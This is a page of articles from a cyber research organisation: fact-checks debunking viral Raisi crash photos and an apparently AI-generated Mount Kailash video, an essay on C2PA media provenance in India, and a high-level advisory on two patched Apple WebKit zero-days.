#FactCheck - Viral Photos Falsely Linked to Iranian President Ebrahim Raisi's Helicopter Crash
Research Wing
Innovation and Research
PUBLISHED ON
Jun 6, 2024
10
Executive Summary:
On 20th May, 2024, Iranian President Ebrahim Raisi and several others died in a helicopter crash that occurred northwest of Iran. The images circulated on social media claiming to show the crash site, are found to be false. CyberPeace Research Team’s investigation revealed that these images show the wreckage of a training plane crash in Iran's Mazandaran province in 2019 or 2020. Reverse image searches and confirmations from Tehran-based Rokna Press and Ten News verified that the viral images originated from an incident involving a police force's two-seater training plane, not the recent helicopter crash.
Claims:
The images circulating on social media claim to show the site of Iranian President Ebrahim Raisi's helicopter crash.
After receiving the posts, we reverse-searched each of the images and found a link to the 2020 Air Crash incident, except for the blue plane that can be seen in the viral image. We found a website where they uploaded the viral plane crash images on April 22, 2020.
According to the website, a police training plane crashed in the forests of Mazandaran, Swan Motel. We also found the images on another Iran News media outlet named, ‘Ten News’.
The Photos uploaded on to this website were posted in May 2019. The news reads, “A training plane that was flying from Bisheh Kolah to Tehran. The wreckage of the plane was found near Salman Shahr in the area of Qila Kala Abbas Abad.”
Hence, we concluded that the recent viral photos are not of Iranian President Ebrahim Raisi's Chopper Crash, It’s false and Misleading.
Conclusion:
The images being shared on social media as evidence of the helicopter crash involving Iranian President Ebrahim Raisi are incorrectly shown. They actually show the aftermath of a training plane crash that occurred in Mazandaran province in 2019 or 2020 which is uncertain. This has been confirmed through reverse image searches that traced the images back to their original publication by Rokna Press and Ten News. Consequently, the claim that these images are from the site of President Ebrahim Raisi's helicopter crash is false and Misleading.
Claim: Viral images of Iranian President Raisi's fatal chopper crash.
Claimed on: X (Formerly known as Twitter), YouTube, Instagram
A viral video is surfacing claiming to capture an aerial view of Mount Kailash that has breathtaking scenery apparently providing a rare real-life shot of Tibet's sacred mountain. Its authenticity was investigated, and authenticity versus digitally manipulative features were analyzed.
CLAIMS:
The viral video claims to reveal the real aerial shot of Mount Kailash, as if exposing us to the natural beauty of such a hallowed mountain. The video was circulated widely in social media, with users crediting it to be the actual footage of Mount Kailash.
The viral video that was circulated through social media was not real footage of Mount Kailash. The reverse image search revealed that it is an AI-generated video created by Sonam and Namgyal, two Tibet based graphic artists on Midjourney. The advanced digital techniques used helped to provide a realistic lifelike scene in the video.
No media or geographical source has reported or published the video as authentic footage of Mount Kailash. Besides, several visual aspects, including lighting and environmental features, indicate that it is computer-generated.
For further verification, we used Hive Moderation, a deep fake detection tool to conclude whether the video is AI-Generated or Real. It was found to be AI generated.
CONCLUSION:
The viral video claiming to show an aerial view of Mount Kailash is an AI-manipulated creation, not authentic footage of the sacred mountain. This incident highlights the growing influence of AI and CGI in creating realistic but misleading content, emphasizing the need for viewers to verify such visuals through trusted sources before sharing.
Claim: Digitally Morphed Video of Mt. Kailash, Showcasing Stunning White Clouds
Claimed On: X (Formerly Known As Twitter), Instagram
Fact Check: AI-Generated (Checked using Hive Moderation).
With the rise of AI deepfakes and manipulated media, it has become difficult for the average internet user to know what they can trust online. Synthetic media can have serious consequences, from virally spreading election disinformation or medical misinformation to serious consequences like revenge porn and financial fraud. Recently, a Pune man lost ₹43 lakh when he invested money based on a deepfake video of Infosys founder Narayana Murthy. In another case, that of Babydoll Archi, a woman from Assam had her likeness deepfaked by an ex-boyfriend to create revenge porn.
Image or video manipulation used to leave observable traces. Online sources may advise examining the edges of objects in the image, checking for inconsistent patterns, lighting differences, observing the lip movements of the speaker in a video or counting the number of fingers on a person’s hand. Unfortunately, as the technology improves, such folk advice might not always help users identify synthetic and manipulated media.
The Coalition for Content Provenance and Authenticity (C2PA)
One interesting project in the area of trust-building under these circumstances has been the Coalition for Content Provenance and Authenticity (C2PA). Started in 2019 by Adobe and Microsoft, C2PA is a collaboration between major players in AI, social media, journalism, and photography, among others. It set out to create a standard for publishers of digital media to prove the authenticity of digital media and track changes as they occur.
When photos and videos are captured, they generally store metadata like the date and time of capture, the location, the device it was taken on, etc. C2PA developed a standard for sharing and checking the validity of this metadata, and adding additional layers of metadata whenever a new user makes any edits. This creates a digital record of any and all changes made. Additionally, the original media is bundled with this metadata. This makes it easy to verify the source of the image and check if the edits change the meaning or impact of the media. This standard allows different validation software, content publishers and content creation tools to be interoperable in terms of maintaining and displaying proof of authenticity.
Source: C2PA website
The standard is intended to be used on an opt-in basis and can be likened to a nutrition label for digital media. Importantly, it does not limit the creativity of fledgling photo editors or generative AI enthusiasts; it simply provides consumers with more information about the media they come across.
Could C2PA be Useful in an Indian Context?
The World Economic Forum’s Global Risk Report 2024, identifies India as a significant hotspot for misinformation. The recent AI Regulation report by MeitY indicates an interest in tools for watermarking AI-based synthetic content for ease of detecting and tracking harmful outcomes. Perhaps C2PA can be useful in this regard as it takes a holistic approach to tracking media manipulation, even in cases where AI is not the medium.
Currently, 26 India-based organisations like the Times of India or Truefy AI have signed up to the Content Authenticity Initiative (CAI), a community that contributes to the development and adoption of tools and standards like C2PA. However, people are increasingly using social media sites like WhatsApp and Instagram as sources of information, both of which are owned by Meta and have not yet implemented the standard in their products.
India also has low digital literacy rates and low resistance to misinformation. Part of the challenge would be showing people how to read this nutrition label, to empower people to make better decisions online. As such, C2PA is just one part of an online trust-building strategy. It is crucial that education around digital literacy and policy around organisational adoption of the standard are also part of the strategy.
The standard is also not foolproof. Current iterations may still struggle when presented with screenshots of digital media and other non-technical digital manipulation. Linking media to their creator may also put journalists and whistleblowers at risk. Actual use in context will show us more about how to improve future versions of digital provenance tools, though these improvements are not guarantees of a safer internet.
The largest advantage of C2PA adoption would be the democratisation of fact-checking infrastructure. Since media is shared at a significantly faster rate than it can be verified by professionals, putting the verification tools in the hands of people makes the process a lot more scalable. It empowers citizen journalists and leaves a public trail for any media consumer to look into.
Conclusion
From basic colour filters to make a scene more engaging, to removing a crowd from a social media post, to editing together videos of a politician to make it sound like they are singing a song, we are so accustomed to seeing the media we consume be altered in some way. The C2PA is just one way to bring transparency to how media is altered. It is not a one-stop solution, but it is a viable starting point for creating a fairer and democratic internet and increasing trust online. While there are risks to its adoption, it is promising to see that organisations across different sectors are collaborating on this project to be more transparent about the media we consume.
Apple has quickly responded to two severe zero-day threats, CVE-2024-44308 and CVE-2024-44309 in iOS, macOS, visionOS, and Safari. These defects, actively used in more focused attacks presumably by state actors, allow for code execution and cross-site scripting (XSS). In a report shared by Google’s Threat Analysis Group, the existing gaps prove that modern attacks are highly developed. Apple’s mitigation comprises memory management, especially state management to strengthen device security. Users are encouraged to update their devices as soon as possible, turn on automatic updates and be careful in the internet space to avoid these new threats.
Introduction
Apple has proved its devotion to the security issue releasing the updates fixing two zero-day bugs actively exploited by hackers. The bugs, with the IDs CVE-2024-44308 and CVE-2024-44309, are dangerous and can lead to code execution and cross-site scripting attacks. The vulnerabilities have been employed in attack and the significance of quick patch release for the safety of the users.
Vulnerabilities in Detail
The discovery of vulnerabilities (CVE-2024-44308, CVE-2024-44309) is credited to Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group (TAG). These vulnerabilities were found in JavaScriptCore and WebKit, integral components of Apple’s web rendering framework. The details of these vulnerabilities are mentioned below:
CVE-2024-44308
Severity: High (CVSS score: 8.8)
Description: A flaw in the JavaScriptCore component of WebKit. Malicious web content could cause code to be executed on the target system and make the system vulnerable to the full control of the attacker.
Technical Finding: This vulnerability involves bad handling of memory in the course of executing JavaScript, allowing the use of injected payloads remotely by the attackers.
CVE-2024-44309
Severity: Moderate (CVSS score: 6.1)
Description: A cookie management flaw in WebKit which might result in cross site scripting (XSS). This vulnerability enables the attackers to embed unauthorized scripts into genuine websites and endanger the privacy of users as well as their identities.
Technical Finding: This issue arises because of wrong handling of cookies at the state level while processing the maliciously crafted web content and provides an unauthorized route to session data.
Affected Systems
These vulnerabilities impact a wide range of Apple devices and software versions:
iOS 18.1.1 and iPadOS 18.1.1: For devices including iPhone XS and later, iPad Pro (13-inch), and iPad mini 5th generation onwards.
iOS 17.7.2 and iPadOS 17.7.2: Supports earlier models such as iPad Pro (10.5-inch) and iPad Air 3rd generation.
macOS Sequoia 15.1.1: Specifically targets systems running macOS Sequoia.
visionOS 2.1.1: Exclusively for Apple Vision Pro.
Safari 18.1.1: For Macs running macOS Ventura and Sonoma.
Apple's Mitigation Approach
Apple has implemented the following fixes:
CVE-2024-44308: Enhanced input validation and robust memory checks to prevent arbitrary code execution.
CVE-2024-44309: Improved state management to eliminate cookie mismanagement vulnerabilities.
These measures ensure stronger protection against exploitation and bolster the underlying security architecture of affected components.
Broader Implications
The exploitation of these zero-days highlights the evolving nature of threat landscapes:
Increasing Sophistication: Attackers are refining techniques to target niche vulnerabilities, bypassing traditional defenses.
Spyware Concerns: These flaws align with the modus operandi of spyware tools, potentially impacting privacy and national security.
Call for Timely Updates: Users delaying updates inadvertently increase their risk exposure
Technical Recommendations for Users
To mitigate potential risks:
Update Devices Promptly: Install the latest patches for iOS, macOS, visionOS, and Safari.
Enable Automatic Updates: Ensures timely application of future patches.
Restrict WebKit Access: Avoid visiting untrusted websites until updates are installed.
Monitor System Behavior: Look for anomalies that could indicate exploitation.
Conclusion
The exploitation of CVE-2024-44308 and CVE-2024-44309 targeting Apple devices highlight the importance of timely software updates to protect users from potential exploitation. The swift action of Apple by providing immediate improved checks, state management and security patches. Users are therefore encouraged to install updates as soon as possible to guard against these zero day flaws.
Your institution or organization can partner with us in any one of our initiatives or policy research activities and complement the region-specific resources and talent we need.